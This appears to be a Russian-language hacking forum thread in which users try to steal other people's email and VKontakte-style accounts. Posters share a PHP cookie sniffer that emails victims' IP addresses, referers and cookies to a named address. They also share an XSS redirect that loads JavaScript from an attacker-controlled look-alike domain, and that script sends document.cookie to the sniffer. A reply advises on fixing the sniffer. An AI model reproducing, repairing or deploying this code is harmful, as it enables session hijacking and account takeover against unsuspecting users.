.::Gh0st::.

зафигачила скрипт в инет (хост поддерживает пхп)
отправила ссылку на сайт на мыло. пришел только id текущей сессии, но это мне врядли поможет... ибо мне нужно узнать пароль от ящика, но который отправляется письмо. с остальными снифами та же трабла, шлет IP, ID, еще какую то хрень, но пасс не шлет. я вообщето, даже и на хэш пасса согласна , дешифровщиком тьма..
добавь пожалуйста в свой скрипт фунцию тырения пароля ))
---------------------
+ наставлю, не вапрос!

суть в том, что нужно не просто ссылку заслать, а выполнить javascript в контексте уязвимого сайта и послать куки на свой скрипт. просто зайти поссылке - результата не даст.

А чё за она?
Покажи что написанно.

привет можете обьяснить не получаеться кое что

<?
$mymail = 'potter234@mail.ru';

$date = date('d.m.y - H:i:s');
$ip = UrlDecode(getenv('REMOTE_ADDR'));
$referer = UrlDecode(getenv('HTTP_REFERER'));
$query = UrlDecode(getenv('QUERY_STRING'));
$cookie=getenv('HTTP_COOKIE');

mail("$mymail", "Kyka npuIIIJIa", " Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie");
?>

это скрипт

я пишу два скрипта

index.php
<script>document.location.href="уязвимост ь=%22%3E%3Cscript%20src=http://vkontaktes.h16.ru/js.js%3E%3C/script%3E"</script>
js.js
img=new Image(); img.src="http://vkontaktes.h16.ru/1.php"+document.cookie;

1.php- это для прихода куков на мыло
куки не идут на мыло и приходит токо айпи

кто скажет или снимет видео как на сайт установить сниффер?

ты для начала исходники хорошие найди

а то исходников много а есть и не рабочие!!!

например как твои исходники. ты сейвишь куки своего сайта а надо из query стринг так что убирай ваще то что $cookie=getenv('HTTP_COOKIE'); и тд. а вообще... за археологию банят